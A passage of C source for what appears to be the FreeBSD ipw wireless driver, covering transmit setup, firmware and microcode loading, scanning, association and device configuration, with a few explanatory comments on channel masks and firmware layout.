SLIST_REMOVE_HEAD(&sc->free_sbuf, next); SLIST_REMOVE_HEAD(&sc->free_shdr, next); sbd = &sc->stbd_list[sc->txcur]; sbd->type = IPW_SBD_TYPE_HEADER; sbd->priv = shdr; sbd->bd->physaddr = htole32(physaddr); sbd->bd->len = htole32(sizeof (struct ipw_hdr)); sbd->bd->nfrag = 1 + nsegs; sbd->bd->flags = IPW_BD_FLAG_TX_FRAME_802_3 | IPW_BD_FLAG_TX_NOT_LAST_FRAGMENT; DPRINTFN(5, ("sending tx hdr (%u, %u, %u, %u, %6D, %6D)\n", shdr->hdr.type, shdr->hdr.subtype, shdr->hdr.encrypted, shdr->hdr.encrypt, shdr->hdr.src_addr, ":", shdr->hdr.dst_addr, ":")); sc->txfree--; sc->txcur = (sc->txcur + 1) % IPW_NTBD; sbuf->m = m0; sbuf->ni = ni; for (i = 0; i < nsegs; i++) { sbd = &sc->stbd_list[sc->txcur]; sbd->bd->physaddr = htole32(segs[i].ds_addr); sbd->bd->len = htole32(segs[i].ds_len); sbd->bd->nfrag = 0; sbd->bd->flags = IPW_BD_FLAG_TX_FRAME_802_3; if (i == nsegs - 1) { sbd->type = IPW_SBD_TYPE_DATA; sbd->priv = sbuf; sbd->bd->flags |= IPW_BD_FLAG_TX_LAST_FRAGMENT; } else { sbd->type = IPW_SBD_TYPE_NOASSOC; sbd->bd->flags |= IPW_BD_FLAG_TX_NOT_LAST_FRAGMENT; } DPRINTFN(5, ("sending fragment (%d)\n", i)); sc->txfree--; sc->txcur = (sc->txcur + 1) % IPW_NTBD; } bus_dmamap_sync(sc->hdr_dmat, shdr->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txbuf_dmat, sbuf->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->tbd_dmat, sc->tbd_map, BUS_DMASYNC_PREWRITE); /* kick firmware */ CSR_WRITE_4(sc, IPW_CSR_TX_WRITE, sc->txcur); return 0; } static int ipw_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { /* no support; just discard */ m_freem(m); ieee80211_free_node(ni); return 0; } static void ipw_start(struct ifnet *ifp) { struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); ipw_start_locked(ifp); IPW_UNLOCK(sc); } static void ipw_start_locked(struct ifnet *ifp) { struct ipw_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; IPW_LOCK_ASSERT(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if 
(sc->txfree < 1 + IPW_MAX_NSEG) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (ipw_tx_start(ifp, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } /* start watchdog timer */ sc->sc_tx_timer = 5; } } static void ipw_watchdog(void *arg) { struct ipw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IPW_LOCK_ASSERT(sc); if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; taskqueue_enqueue(taskqueue_swi, &sc->sc_init_task); } } if (sc->sc_scan_timer > 0) { if (--sc->sc_scan_timer == 0) { DPRINTFN(3, ("Scan timeout\n")); /* End the scan */ if (sc->flags & IPW_FLAG_SCANNING) { IPW_UNLOCK(sc); ieee80211_scan_done(TAILQ_FIRST(&ic->ic_vaps)); IPW_LOCK(sc); sc->flags &= ~IPW_FLAG_SCANNING; } } } if (ifp->if_drv_flags & IFF_DRV_RUNNING) callout_reset(&sc->sc_wdtimer, hz, ipw_watchdog, sc); } static int ipw_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ipw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: IPW_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { ipw_init_locked(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) ipw_stop_locked(sc); } IPW_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void ipw_stop_master(struct ipw_softc *sc) { uint32_t tmp; int ntries; /* disable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, 0); CSR_WRITE_4(sc, IPW_CSR_RST, IPW_RST_STOP_MASTER); for (ntries = 0; ntries < 50; ntries++) { if (CSR_READ_4(sc, IPW_CSR_RST) & IPW_RST_MASTER_DISABLED) break; DELAY(10); } if (ntries == 50) device_printf(sc->sc_dev, "timeout waiting for master\n"); tmp = CSR_READ_4(sc, IPW_CSR_RST); CSR_WRITE_4(sc, IPW_CSR_RST, tmp | IPW_RST_PRINCETON_RESET); /* Clear all flags except the following */ sc->flags &= IPW_FLAG_HAS_RADIO_SWITCH; } static int ipw_reset(struct ipw_softc *sc) { uint32_t tmp; int ntries; ipw_stop_master(sc); /* move adapter to D0 state */ tmp = CSR_READ_4(sc, IPW_CSR_CTL); CSR_WRITE_4(sc, IPW_CSR_CTL, tmp | IPW_CTL_INIT); /* wait for clock stabilization */ for (ntries = 0; ntries < 1000; ntries++) { if (CSR_READ_4(sc, IPW_CSR_CTL) & IPW_CTL_CLOCK_READY) break; DELAY(200); } if (ntries == 1000) return EIO; tmp = CSR_READ_4(sc, IPW_CSR_RST); CSR_WRITE_4(sc, IPW_CSR_RST, tmp | IPW_RST_SW_RESET); DELAY(10); tmp = CSR_READ_4(sc, IPW_CSR_CTL); CSR_WRITE_4(sc, IPW_CSR_CTL, tmp | IPW_CTL_INIT); return 0; } static int ipw_waitfordisable(struct ipw_softc *sc, int waitfor) { int ms = hz < 1000 ? 1 : hz/10; int i, error; for (i = 0; i < 100; i++) { if (ipw_read_table1(sc, IPW_INFO_CARD_DISABLED) == waitfor) return 0; error = msleep(sc, &sc->sc_mtx, PCATCH, __func__, ms); if (error == 0 || error != EWOULDBLOCK) return 0; } DPRINTF(("%s: timeout waiting for %s\n", __func__, waitfor ? 
"disable" : "enable")); return ETIMEDOUT; } static int ipw_enable(struct ipw_softc *sc) { int error; if ((sc->flags & IPW_FLAG_ENABLED) == 0) { DPRINTF(("Enable adapter\n")); error = ipw_cmd(sc, IPW_CMD_ENABLE, NULL, 0); if (error != 0) return error; error = ipw_waitfordisable(sc, 0); if (error != 0) return error; sc->flags |= IPW_FLAG_ENABLED; } return 0; } static int ipw_disable(struct ipw_softc *sc) { int error; if (sc->flags & IPW_FLAG_ENABLED) { DPRINTF(("Disable adapter\n")); error = ipw_cmd(sc, IPW_CMD_DISABLE, NULL, 0); if (error != 0) return error; error = ipw_waitfordisable(sc, 1); if (error != 0) return error; sc->flags &= ~IPW_FLAG_ENABLED; } return 0; } /* * Upload the microcode to the device. */ static int ipw_load_ucode(struct ipw_softc *sc, const char *uc, int size) { int ntries; MEM_WRITE_4(sc, 0x3000e0, 0x80000000); CSR_WRITE_4(sc, IPW_CSR_RST, 0); MEM_WRITE_2(sc, 0x220000, 0x0703); MEM_WRITE_2(sc, 0x220000, 0x0707); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210000, 0x40); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x40); MEM_WRITE_MULTI_1(sc, 0x210010, uc, size); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x80); MEM_WRITE_2(sc, 0x220000, 0x0703); MEM_WRITE_2(sc, 0x220000, 0x0707); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x80); for (ntries = 0; ntries < 10; ntries++) { if (MEM_READ_1(sc, 0x210000) & 1) break; DELAY(10); } if (ntries == 10) { device_printf(sc->sc_dev, "timeout waiting for ucode to initialize\n"); return EIO; } MEM_WRITE_4(sc, 0x3000e0, 0); return 0; } /* set of macros to handle unaligned little endian data in firmware image */ #define GETLE32(p) ((p)[0] | (p)[1] << 8 | (p)[2] << 16 | (p)[3] << 24) #define GETLE16(p) ((p)[0] | (p)[1] << 8) static int ipw_load_firmware(struct ipw_softc *sc, const char *fw, int size) { const uint8_t *p, *end; uint32_t tmp, dst; uint16_t len; int error; p = fw; end = fw + size; while (p < end) { dst = GETLE32(p); p += 4; len = GETLE16(p); p += 2; ipw_write_mem_1(sc, dst, p, len); p += len; } CSR_WRITE_4(sc, IPW_CSR_IO, IPW_IO_GPIO1_ENABLE | IPW_IO_GPIO3_MASK | IPW_IO_LED_OFF); /* enable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, IPW_INTR_MASK); /* kick the firmware */ CSR_WRITE_4(sc, IPW_CSR_RST, 0); tmp = CSR_READ_4(sc, IPW_CSR_CTL); CSR_WRITE_4(sc, IPW_CSR_CTL, tmp | IPW_CTL_ALLOW_STANDBY); /* wait at most one second for firmware initialization to complete */ if ((error = msleep(sc, &sc->sc_mtx, 0, "ipwinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for firmware " "initialization to complete\n"); return error; } tmp = CSR_READ_4(sc, IPW_CSR_IO); CSR_WRITE_4(sc, IPW_CSR_IO, tmp | IPW_IO_GPIO1_MASK | IPW_IO_GPIO3_MASK); return 0; } static int ipw_setwepkeys(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ipw_wep_key wepkey; struct ieee80211_key *wk; int error, i; for (i = 0; i < IEEE80211_WEP_NKID; i++) { wk = &vap->iv_nw_keys[i]; if (wk->wk_cipher == NULL || wk->wk_cipher->ic_cipher != IEEE80211_CIPHER_WEP) continue; wepkey.idx = i; wepkey.len = wk->wk_keylen; memset(wepkey.key, 0, sizeof wepkey.key); memcpy(wepkey.key, wk->wk_key, wk->wk_keylen); DPRINTF(("Setting wep key index %u len %u\n", wepkey.idx, wepkey.len)); error = ipw_cmd(sc, IPW_CMD_SET_WEP_KEY, &wepkey, sizeof wepkey); if (error != 0) return 
error; } return 0; } static int ipw_setwpaie(struct ipw_softc *sc, const void *ie, int ielen) { struct ipw_wpa_ie wpaie; memset(&wpaie, 0, sizeof(wpaie)); wpaie.len = htole32(ielen); /* XXX verify length */ memcpy(&wpaie.ie, ie, ielen); DPRINTF(("Setting WPA IE\n")); return ipw_cmd(sc, IPW_CMD_SET_WPA_IE, &wpaie, sizeof(wpaie)); } static int ipw_setbssid(struct ipw_softc *sc, uint8_t *bssid) { static const uint8_t zerobssid[IEEE80211_ADDR_LEN]; if (bssid == NULL || bcmp(bssid, zerobssid, IEEE80211_ADDR_LEN) == 0) { DPRINTF(("Setting mandatory BSSID to null\n")); return ipw_cmd(sc, IPW_CMD_SET_MANDATORY_BSSID, NULL, 0); } else { DPRINTF(("Setting mandatory BSSID to %6D\n", bssid, ":")); return ipw_cmd(sc, IPW_CMD_SET_MANDATORY_BSSID, bssid, IEEE80211_ADDR_LEN); } } static int ipw_setssid(struct ipw_softc *sc, void *ssid, size_t ssidlen) { if (ssidlen == 0) { /* * A bug in the firmware breaks the ``don't associate'' * bit in the scan options command. To compensate for * this install a bogus ssid when no ssid is specified * so the firmware won't try to associate. */ DPRINTF(("Setting bogus ESSID to WAR firmware bug\n")); return ipw_cmd(sc, IPW_CMD_SET_ESSID, "\x18\x19\x20\x21\x22\x23\x24\x25\x26\x27" "\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31" "\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" "\x3c\x3d", IEEE80211_NWID_LEN); } else { #ifdef IPW_DEBUG if (ipw_debug > 0) { printf("Setting ESSID to "); ieee80211_print_essid(ssid, ssidlen); printf("\n"); } #endif return ipw_cmd(sc, IPW_CMD_SET_ESSID, ssid, ssidlen); } } static int ipw_setscanopts(struct ipw_softc *sc, uint32_t chanmask, uint32_t flags) { struct ipw_scan_options opts; DPRINTF(("Scan options: mask 0x%x flags 0x%x\n", chanmask, flags)); opts.channels = htole32(chanmask); opts.flags = htole32(flags); return ipw_cmd(sc, IPW_CMD_SET_SCAN_OPTIONS, &opts, sizeof(opts)); } static int ipw_scan(struct ipw_softc *sc) { uint32_t params; int error; DPRINTF(("%s: flags 0x%x\n", __func__, sc->flags)); if (sc->flags & IPW_FLAG_SCANNING) return (EBUSY); sc->flags |= IPW_FLAG_SCANNING | IPW_FLAG_HACK; /* NB: IPW_SCAN_DO_NOT_ASSOCIATE does not work (we set it anyway) */ error = ipw_setscanopts(sc, 0x3fff, IPW_SCAN_DO_NOT_ASSOCIATE); if (error != 0) goto done; /* * Setup null/bogus ssid so firmware doesn't use any previous * ssid to try and associate. This is because the ``don't * associate'' option bit is broken (sigh). */ error = ipw_setssid(sc, NULL, 0); if (error != 0) goto done; /* * NB: the adapter may be disabled on association lost; * if so just re-enable it to kick off scanning. */ DPRINTF(("Starting scan\n")); sc->sc_scan_timer = 3; if (sc->flags & IPW_FLAG_ENABLED) { params = 0; /* XXX? 
*/ error = ipw_cmd(sc, IPW_CMD_BROADCAST_SCAN, &params, sizeof(params)); } else error = ipw_enable(sc); done: if (error != 0) { DPRINTF(("Scan failed\n")); sc->flags &= ~(IPW_FLAG_SCANNING | IPW_FLAG_HACK); } return (error); } static int ipw_setchannel(struct ipw_softc *sc, struct ieee80211_channel *chan) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t data; int error; data = htole32(ieee80211_chan2ieee(ic, chan)); DPRINTF(("Setting channel to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_CHANNEL, &data, sizeof data); if (error == 0) ipw_setcurchan(sc, chan); return error; } static void ipw_assoc(struct ieee80211com *ic, struct ieee80211vap *vap) { struct ifnet *ifp = vap->iv_ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; struct ieee80211_node *ni = vap->iv_bss; struct ipw_security security; uint32_t data; int error; IPW_LOCK(sc); error = ipw_disable(sc); if (error != 0) goto done; memset(&security, 0, sizeof security); security.authmode = (ni->ni_authmode == IEEE80211_AUTH_SHARED) ? IPW_AUTH_SHARED : IPW_AUTH_OPEN; security.ciphers = htole32(IPW_CIPHER_NONE); DPRINTF(("Setting authmode to %u\n", security.authmode)); error = ipw_cmd(sc, IPW_CMD_SET_SECURITY_INFO, &security, sizeof security); if (error != 0) goto done; data = htole32(vap->iv_rtsthreshold); DPRINTF(("Setting RTS threshold to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_RTS_THRESHOLD, &data, sizeof data); if (error != 0) goto done; data = htole32(vap->iv_fragthreshold); DPRINTF(("Setting frag threshold to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_FRAG_THRESHOLD, &data, sizeof data); if (error != 0) goto done; if (vap->iv_flags & IEEE80211_F_PRIVACY) { error = ipw_setwepkeys(sc); if (error != 0) goto done; if (vap->iv_def_txkey != IEEE80211_KEYIX_NONE) { data = htole32(vap->iv_def_txkey); DPRINTF(("Setting wep tx key index to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_WEP_KEY_INDEX, &data, sizeof data); if (error != 0) goto done; } } data = htole32((vap->iv_flags & IEEE80211_F_PRIVACY) ? IPW_WEPON : 0); DPRINTF(("Setting wep flags to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_WEP_FLAGS, &data, sizeof data); if (error != 0) goto done; error = ipw_setssid(sc, ni->ni_essid, ni->ni_esslen); if (error != 0) goto done; error = ipw_setbssid(sc, ni->ni_bssid); if (error != 0) goto done; if (vap->iv_appie_wpa != NULL) { struct ieee80211_appie *ie = vap->iv_appie_wpa; error = ipw_setwpaie(sc, ie->ie_data, ie->ie_len); if (error != 0) goto done; } if (ic->ic_opmode == IEEE80211_M_IBSS) { error = ipw_setchannel(sc, ni->ni_chan); if (error != 0) goto done; } /* lock scan to ap's channel and enable associate */ error = ipw_setscanopts(sc, 1<<(ieee80211_chan2ieee(ic, ni->ni_chan)-1), 0); if (error != 0) goto done; error = ipw_enable(sc); /* finally, enable adapter */ if (error == 0) sc->flags |= IPW_FLAG_ASSOCIATING; done: IPW_UNLOCK(sc); } static void ipw_disassoc(struct ieee80211com *ic, struct ieee80211vap *vap) { struct ifnet *ifp = vap->iv_ic->ic_ifp; struct ieee80211_node *ni = vap->iv_bss; struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); DPRINTF(("Disassociate from %6D\n", ni->ni_bssid, ":")); /* * NB: don't try to do this if ipw_stop_master has * shutdown the firmware and disabled interrupts. */ if (sc->flags & IPW_FLAG_FW_INITED) { sc->flags &= ~IPW_FLAG_ASSOCIATED; /* * NB: firmware currently ignores bssid parameter, but * supply it in case this changes (follow linux driver).
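/*
 * Editor's illustration (not driver code): the scan-options command takes a
 * bitmask with bit (channel - 1) set for every IEEE channel to sweep, which
 * is why ipw_assoc() above locks the scan to the AP's channel with
 * 1 << (chan - 1) and ipw_scan() passes 0x3fff for channels 1-14.
 * chan_to_mask() is a hypothetical helper used only for this sketch.
 */
#include <assert.h>
#include <stdint.h>

static uint32_t
chan_to_mask(int chan)			/* IEEE channel number, 1..14 */
{
	return (1U << (chan - 1));	/* channel 1 -> bit 0, channel 14 -> bit 13 */
}

static void
chan_mask_example(void)
{
	assert(chan_to_mask(6) == 0x0020);		/* lock to channel 6 only */
	assert((chan_to_mask(14) << 1) - 1 == 0x3fff);	/* all of channels 1-14 */
}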
*/ (void) ipw_cmd(sc, IPW_CMD_DISASSOCIATE, ni->ni_bssid, IEEE80211_ADDR_LEN); } IPW_UNLOCK(sc); } /* * Handler for sc_init_task. This is a simple wrapper around ipw_init(). * It is called on firmware panics or on watchdog timeouts. */ static void ipw_init_task(void *context, int pending) { ipw_init(context); } static void ipw_init(void *priv) { struct ipw_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IPW_LOCK(sc); ipw_init_locked(sc); IPW_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void ipw_init_locked(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); const struct firmware *fp; const struct ipw_firmware_hdr *hdr; const char *fw; IPW_LOCK_ASSERT(sc); DPRINTF(("%s: state %s flags 0x%x\n", __func__, ieee80211_state_name[vap->iv_state], sc->flags)); /* * Avoid re-entrant calls. We need to release the mutex in ipw_init() * when loading the firmware and we don't want to be called during this * operation. */ if (sc->flags & IPW_FLAG_INIT_LOCKED) return; sc->flags |= IPW_FLAG_INIT_LOCKED; ipw_stop_locked(sc); if (ipw_reset(sc) != 0) { device_printf(sc->sc_dev, "could not reset adapter\n"); goto fail; } if (sc->sc_firmware == NULL) { device_printf(sc->sc_dev, "no firmware\n"); goto fail; } /* NB: consistency already checked on load */ fp = sc->sc_firmware; hdr = (const struct ipw_firmware_hdr *)fp->data; DPRINTF(("Loading firmware image '%s'\n", fp->name)); fw = (const char *)fp->data + sizeof *hdr + le32toh(hdr->mainsz); if (ipw_load_ucode(sc, fw, le32toh(hdr->ucodesz)) != 0) { device_printf(sc->sc_dev, "could not load microcode\n"); goto fail; } ipw_stop_master(sc); /* * Setup tx, rx and status rings. 
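/*
 * Editor's illustration of the offset arithmetic above (struct and names are
 * a sketch, not the driver's declarations): the ipw firmware file is a small
 * header followed by the runtime image (hdr->mainsz bytes) and then the
 * microcode (hdr->ucodesz bytes), so both blobs are located by simple
 * offsets from the start of the file.
 */
#include <stdint.h>

struct fw_hdr_sketch {
	uint32_t	mainsz;		/* size of runtime firmware image */
	uint32_t	ucodesz;	/* size of microcode image */
	/* the real ipw_firmware_hdr is declared in the driver headers */
};

static void
fw_locate(const uint8_t *file, const struct fw_hdr_sketch *hdr,
    const uint8_t **fw, const uint8_t **ucode)
{
	*fw    = file + sizeof(*hdr);			/* runtime image follows the header */
	*ucode = file + sizeof(*hdr) + hdr->mainsz;	/* microcode follows the runtime image */
}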
*/ sc->txold = IPW_NTBD - 1; sc->txcur = 0; sc->txfree = IPW_NTBD - 2; sc->rxcur = IPW_NRBD - 1; CSR_WRITE_4(sc, IPW_CSR_TX_BASE, sc->tbd_phys); CSR_WRITE_4(sc, IPW_CSR_TX_SIZE, IPW_NTBD); CSR_WRITE_4(sc, IPW_CSR_TX_READ, 0); CSR_WRITE_4(sc, IPW_CSR_TX_WRITE, sc->txcur); CSR_WRITE_4(sc, IPW_CSR_RX_BASE, sc->rbd_phys); CSR_WRITE_4(sc, IPW_CSR_RX_SIZE, IPW_NRBD); CSR_WRITE_4(sc, IPW_CSR_RX_READ, 0); CSR_WRITE_4(sc, IPW_CSR_RX_WRITE, sc->rxcur); CSR_WRITE_4(sc, IPW_CSR_STATUS_BASE, sc->status_phys); fw = (const char *)fp->data + sizeof *hdr; if (ipw_load_firmware(sc, fw, le32toh(hdr->mainsz)) != 0) { device_printf(sc->sc_dev, "could not load firmware\n"); goto fail; } sc->flags |= IPW_FLAG_FW_INITED; /* retrieve information tables base addresses */ sc->table1_base = CSR_READ_4(sc, IPW_CSR_TABLE1_BASE); sc->table2_base = CSR_READ_4(sc, IPW_CSR_TABLE2_BASE); ipw_write_table1(sc, IPW_INFO_LOCK, 0); if (ipw_config(sc) != 0) { device_printf(sc->sc_dev, "device configuration failed\n"); goto fail; } callout_reset(&sc->sc_wdtimer, hz, ipw_watchdog, sc); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->flags &=~ IPW_FLAG_INIT_LOCKED; return; fail: ipw_stop_locked(sc); sc->flags &=~ IPW_FLAG_INIT_LOCKED; } static int ipw_config(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ipw_configuration config; uint32_t data; int error; error = ipw_disable(sc); if (error != 0) return error; switch (ic->ic_opmode) { case IEEE80211_M_STA: case IEEE80211_M_HOSTAP: case IEEE80211_M_WDS: /* XXX */ data = htole32(IPW_MODE_BSS); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: data = htole32(IPW_MODE_IBSS); break; case IEEE80211_M_MONITOR: data = htole32(IPW_MODE_MONITOR); break; default: device_printf(sc->sc_dev, "unknown opmode %d\n", ic->ic_opmode); return EINVAL; } DPRINTF(("Setting mode to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_MODE, &data, sizeof data); if (error != 0) return error; if (ic->ic_opmode == IEEE80211_M_IBSS || ic->ic_opmode == IEEE80211_M_MONITOR) { error = ipw_setchannel(sc, ic->ic_curchan); if (error != 0) return error; } if (ic->ic_opmode == IEEE80211_M_MONITOR) return ipw_enable(sc); config.flags = htole32(IPW_CFG_BSS_MASK | IPW_CFG_IBSS_MASK | IPW_CFG_PREAMBLE_AUTO | IPW_CFG_802_1x_ENABLE); if (ic->ic_opmode == IEEE80211_M_IBSS) config.flags |= htole32(IPW_CFG_IBSS_AUTO_START); if (ifp->if_flags & IFF_PROMISC) config.flags |= htole32(IPW_CFG_PROMISCUOUS); config.bss_chan = htole32(0x3fff); /* channels 1-14 */ config.ibss_chan = htole32(0x7ff); /* channels 1-11 */ DPRINTF(("Setting configuration to 0x%x\n", le32toh(config.flags))); error = ipw_cmd(sc, IPW_CMD_SET_CONFIGURATION, &config, sizeof config); if (error != 0) return error; data = htole32(0xf); /* 1, 2, 5.5, 11 */ DPRINTF(("Setting basic tx rates to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_BASIC_TX_RATES, &data, sizeof data); if (error != 0) return error; /* Use the same rate set */ DPRINTF(("Setting msdu tx rates to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_MSDU_TX_RATES, &data, sizeof data); if (error != 0) return error; /* Use the same rate set */ DPRINTF(("Setting tx rates to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_TX_RATES, &data, sizeof data); if (error != 0) return error; data = htole32(IPW_POWER_MODE_CAM); DPRINTF(("Setting power mode to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_POWER_MODE, &data, sizeof data); if (error != 0) return error; if (ic->ic_opmode 
== IEEE80211_M_IBSS) { data = htole32(32); /* default value */ DPRINTF(("Setting tx power index to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_TX_POWER_INDEX, &data, sizeof data); if (error != 0) return error; } return 0; } static void ipw_stop(void *priv) { struct ipw_softc *sc = priv; IPW_LOCK(sc); ipw_stop_locked(sc); IPW_UNLOCK(sc); } static void ipw_stop_locked(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int i; IPW_LOCK_ASSERT(sc); callout_stop(&sc->sc_wdtimer); ipw_stop_master(sc); CSR_WRITE_4(sc, IPW_CSR_RST, IPW_RST_SW_RESET); /* * Release tx buffers. */ for (i = 0; i < IPW_NTBD; i++) ipw_release_sbd(sc, &sc->stbd_list[i]); sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); } static int ipw_sysctl_stats(SYSCTL_HANDLER_ARGS) { struct ipw_softc *sc = arg1; uint32_t i, size, buf[256]; memset(buf, 0, sizeof buf); if (!(sc->flags & IPW_FLAG_FW_INITED)) return SYSCTL_OUT(req, buf, sizeof buf); CSR_WRITE_4(sc, IPW_CSR_AUTOINC_ADDR, sc->table1_base); size = min(CSR_READ_4(sc, IPW_CSR_AUTOINC_DATA), 256); for (i = 1; i < size; i++) buf[i] = MEM_READ_4(sc, CSR_READ_4(sc, IPW_CSR_AUTOINC_DATA)); return SYSCTL_OUT(req, buf, size); } static int ipw_sysctl_radio(SYSCTL_HANDLER_ARGS) { struct ipw_softc *sc = arg1; int val; val = !((sc->flags & IPW_FLAG_HAS_RADIO_SWITCH) && (CSR_READ_4(sc, IPW_CSR_IO) & IPW_IO_RADIO_DISABLED)); return SYSCTL_OUT(req, &val, sizeof val); } static uint32_t ipw_read_table1(struct ipw_softc *sc, uint32_t off) { return MEM_READ_4(sc, MEM_READ_4(sc, sc->table1_base + off)); } static void ipw_write_table1(struct ipw_softc *sc, uint32_t off, uint32_t info) { MEM_WRITE_4(sc, MEM_READ_4(sc, sc->table1_base + off), info); } #if 0 static int ipw_read_table2(struct ipw_softc *sc, uint32_t off, void *buf, uint32_t *len) { uint32_t addr, info; uint16_t count, size; uint32_t total; /* addr[4] + count[2] + size[2] */ addr = MEM_READ_4(sc, sc->table2_base + off); info = MEM_READ_4(sc, sc->table2_base + off + 4); count = info >> 16; size = info & 0xffff; total = count * size; if (total > *len) { *len = total; return EINVAL; } *len = total; ipw_read_mem_1(sc, addr, buf, total); return 0; } static void ipw_read_mem_1(struct ipw_softc *sc, bus_size_t offset, uint8_t *datap, bus_size_t count) { for (; count > 0; offset++, datap++, count--) { CSR_WRITE_4(sc, IPW_CSR_INDIRECT_ADDR, offset & ~3); *datap = CSR_READ_1(sc, IPW_CSR_INDIRECT_DATA + (offset & 3)); } } #endif static void ipw_write_mem_1(struct ipw_softc *sc, bus_size_t offset, const uint8_t *datap, bus_size_t count) { for (; count > 0; offset++, datap++, count--) { CSR_WRITE_4(sc, IPW_CSR_INDIRECT_ADDR, offset & ~3); CSR_WRITE_1(sc, IPW_CSR_INDIRECT_DATA + (offset & 3), *datap); } } static void ipw_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); ipw_scan(sc); IPW_UNLOCK(sc); } static void ipw_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); if (ic->ic_opmode == IEEE80211_M_MONITOR) { ipw_disable(sc); ipw_setchannel(sc, ic->ic_curchan); ipw_enable(sc); } IPW_UNLOCK(sc); } static void ipw_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell) { /* NB: all channels are scanned at once */ } static void ipw_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void ipw_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = 
